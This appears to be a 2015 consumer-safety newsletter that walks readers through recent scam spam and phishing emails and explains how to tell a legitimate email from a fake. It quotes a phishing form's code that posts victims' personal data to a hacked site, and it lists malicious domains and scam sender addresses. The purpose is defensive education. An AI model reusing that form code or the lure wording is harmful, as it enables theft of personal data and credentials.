Please support our effort by making a small donation. Thank you!

x

November 11, 2015

THE WEEK IN REVIEW

During the past week criminal gangs that push out scam spam (say that 3 times fast!) launched a Scampaign. One of our subscribing organizations sent us this screen shot of thousands of emails hitting their server. Nearly all of them were scam spam. Have a look at the blue bar for November 6.

This is just one of millions of daily online criminal events that governments and law enforcement across the world are unable to do anything about. We are all held hostage by an organization called ICANN. They are the ineffective governing body in charge of the Internet’s domain naming system and they appear to be unable (or unwilling) to do anything to protect netizens from misuse like this or the many other ways in which criminals target people through domain misuse.

Sample Scam Subject Lines:

Attn: View your Experian credit score for $0

Best offer here

CANCUN IS WAITING; compare travel packages, HERE

Congratulations on your Amazon Prime Christmas Voucher

CNNHealth Report- Millionaires, Entrepreneurs Using the Brain Pill Advantage

Curb the addiction Live cigarette free

Dash Cam Pro The Personal Security Camera For Your Car

Don’t let your Amazon points expire

GOOD DAY TO YOU

Harvard Study: 1 in 3 people will die of heart disease

Hi look at my naked photos!

Mailbox

Re: CLEARANCE: Beats Pro Over-Ear-Heaphones $12.67, Thru November 7, 2015

Sample Scam Email Addresses:

Amazon.Customer.Appreciation@rtsmithes.xyz

BaddictionHelp@signingwhile.download

CheapWristbands@nonafilliated.download
CulinaryInstitute@ghlying.download

Dr.Mark.Stengler@synchouse.xyz

FindALawyer@caufight.download

Holiday-Special@seachess.xyz

MoveForLess@oophorectomize.dowload

NonProfitJobs@articulatory.download

OnlineEducationToday@colorators.download

Santa_Gift_Points@socialtheft.xyz

US-Army-Survival-Tool@uizse.xyz

VacationtoHawaii@youngolder.xyz

 

 

 

 

Phish NETS: Apple Global Service Exchange and Web Mail

For businesses and institutions that want to handle their own Apple Computer repairs and service there is something call the Apple Global Service Exchange or GSX. Have a look at this email from gsx.notification@update.com (Not from Apple.com!) The email contains an attached web document designed to collect lots of personal information and to look like it is related to Apple’s legitimate GSX site, but with one very small but extremely important difference…

The gsx_form_verification.htm file contains lots of web code, including an input form instructing the file to send all your personal data to a website. Here is a small screenshot of that portion of the file.   It says action=”http://agent000.com/media/dl.php” method=”post”. This means that all your precious personal data will be sent to a website named agent000.com.

3-GSX Apple notification form code to website

According to a WHOIS lookup   agent000.com is “ENielsen’s Blog-o-rrific Blogarama” website and Google shows it as a “commuter bike” site. Looks like they’be been hacked. What does VirusTotal.com think of it? Their message couldn’t be more clear.

Delete….

Many people who own websites use web-based email through their website providers. That’s who these next two phishing scams target. They want to capture the login information for web-based emails so they can use the accounts to push out more scam spam, no doubt. By the way, how is your world geography? Look at the mouse-over produced in this first email when the mouse hovers over “please click here now.” Do you see the 2-letter country code revealed in the link? But where is “.ro” in the world? (Answer is at the bottom of this column.)

5-Password notification

The second phishing scam is very poorly written and lame. No one will EVER ask you to provide your password to anything in an email. And if they do, it means it isn’t legitimate!

Just delete!

6-Upgrading all staff mailbox

(Country code answer: .ro = hosted in Romania!)

Your Money: Best Deals on SUVs and Home Wireless Security Cameras

This is a test of your powers of observation as we follow these next two scams down their rabbit holes…

Considering the purchase of an SUV? How about this overstocked lot offering the best deals on new and used SUVs? Just click the links “Choose your Make” and “SEARCH TO CHECK AVAILABILITY.” And then kiss your computer goodbye… The email was sent from, and connects to, a domain called aimederal.com.

7-Best deals on new and used SUVs

A WHOIS lookup of aimederal.com  shows that it was registered on November 4, the day the email was sent, through the registrar Enom.com to someone named Greg Shaw in Los Angeles, CA. But no website can be found there. (Don’t confuse this site with aimfederal.com) We asked the Zulu URL Risk Analyzer to have a look and it identified the site as 100% malicious…

8-Best deals on new and uses SUVs zulu score

Need a home security camera? Readers in urban areas, and even suburban areas who routinely receive package deliveries to their homes have probably heard about the growing problem of package theft from their porch or front door. That explains why many homeowners are installing inexpensive home video cameras. This email about home security plans couldn’t be more timely. It was sent from Home-Protection@jenkirches.com with links to the same domain. Notice the white text against the white background we found at the bottom of the email. The first paragraph of this hidden text came from an article titled “Trumpeter’s Neck Swells Like a Bullfrog” that we found on LiveScience.com.

9-Home wireless security camera

A Google search for the “subdomain.domain” of the link in this email turns up nothing. We then asked the Zulu URL Risk Analyzer to look at the link in the email and it reported it as suspicious. (Check out our article on how to use the Zulu URL Risk Analyzer!) Be sure to have a close look at the Zulu results…

10-Home wireless security camera -Google search

11-Home wireless security camera zulu score1

Zulu shows that a visit to the website offered through the link in the home security email also contains a redirect to another website named destinationclass.com. Does this sound familiar? How closely did you look at the first scam above for SUVs that was received 2 days earlier? Did you notice that the Zulu URL Risk Analyzer also showed that the malicious website aimederal.com also contained a redirect to destinationclass.com? What does Zulu think about the links for destinationclass.com?

12-Home wireless security camera zulu score 2 redirect

Harmless?? We seriously doubt that! Zulu is good but not perfect. What can Google tell us about destinationclass.com? It found a website but had absolutely nothing to say about the website. Zero. We asked a WHOIS about destinationclass.com and learned that it was registered back in 2010 through a U.S.-based Privacy Protection Service, so without a court order we’ll never know who owns the website. This is where the rabbit hole gets very deep and dark. Our advice?

Stay away from DestinationClass.com as well, and…

Delete, delete, delete!

13-Home wireless security camera google search 2

 

TOP STORY: Why is This Legitimate Email?

We spend so much time educating our readers about scam posts, texts and emails that sometimes it is important to point out why something is legitimate. Take the email from Dunkin Donuts below as our example. “Thank you for registering your DD Card.” It looks like it could be a perfect target for scammers but this email is legitimate. Look at it carefully. What things do you spot that tell you it’s OK?

14-LEGIT DD Card

 

 

Let’s break it down…

  1. The email comes from a long weird email address but nothing in front of the “@” symbol is important. Focus on the text after @: email.dunkindonuts.com. The dot-com is called the Global Top Level Domain (gTLD) and the domain is found immediately in front of it, separated by a period. And what’s the domain? DunkinDonuts The “bounce” and “email” (separated by periods) are called subdomains and are not important. This email from Dunkin Donuts appears to have been sent from dunkindonuts.com. As it should! However, email addresses can be spoofed by the best criminal gangs so this isn’t proof positive, just reassuring.
  2. Look at the email itself. Dear… It identified the recipient by first name. “Thanks for registering your Dunkin’ Donuts card 611…” The recipient of this email did recently register a DD Card so the email isn’t unexpected! And his first name matched the email.
  3. A mouse-over of every single link in the email points back to com. Look at the mouse-over above captured from “>>Find a Dunkin’” It appears to point to a website called click.email.dunkindonuts.com/(bunch of characters) The bunch of characters that follow the first single forward slash are not important at all. Neither are the subdomains click and email. The only important part to notice is the domain and gTLD: dunkindonuts.com.

In today’s day and age of Internet deceipt and trickery, it’s always important to verify the emails that pour into your inbox. To learn more about understanding what makes something legitimate, ready our article Why is this legitimate?

FOR YOUR SAFETY: Amazon Order Confirmation, Dropbox Shared Document

Though received in October, a reader recently sent us this malicious email and we felt it worth sharing with our readers. “Your Amazon.com order confirmation for [your name]” is a very well disguised threat meant to infect your computer. Everything about this email looked legitimate. However, look carefully at what the sender asked you to do… “Please find attached the billing confirmation receipt.” (Notice the awkward English.) The attached “receipt” was a zip file containing malicious software.

Delete!

15-Amazon order confirmation - iPhone 6

This next email came from a legitimate user’s email account “(name) Has Shared A Document” and the email is signed “Thank you!” from the Dropbox Team. Dropbox is a free online service for sharing documents. But our sender was a criminal misusing a hacked personal email account. We moused over the link “View Document Now” to find that it doesn’t point to Dropbox.com. The link points to a strange website called kefu580.com. Have a look below at what VirusTotal.com thought about this link. We don’t often see such a strong collective opinion from VirusTotal.

Now delete!

16-Dropbox shared document

 

17-Dropbox shared doc virustotal score

 

ON THE LIGHTER SIDE: Your Next of Kin Died in a Car Accident

This week’s “on the lighter side” column may seem like an oxymoron because I received some terribly sad news. Apparently my “next of kin” in Nigeria told the United Nations Committee that I died last week in a car accident in Nigeria. Boo-hoo. The President of Nigeria is asking me to confirm that I am dead. If none of this makes sense to you, try reading the email below while I look for a necromancer so I can speak with the living and claim my money. (And we loved the sender’s right-to-the-point email address: callme@gmail.com)

Until next week, surf safely!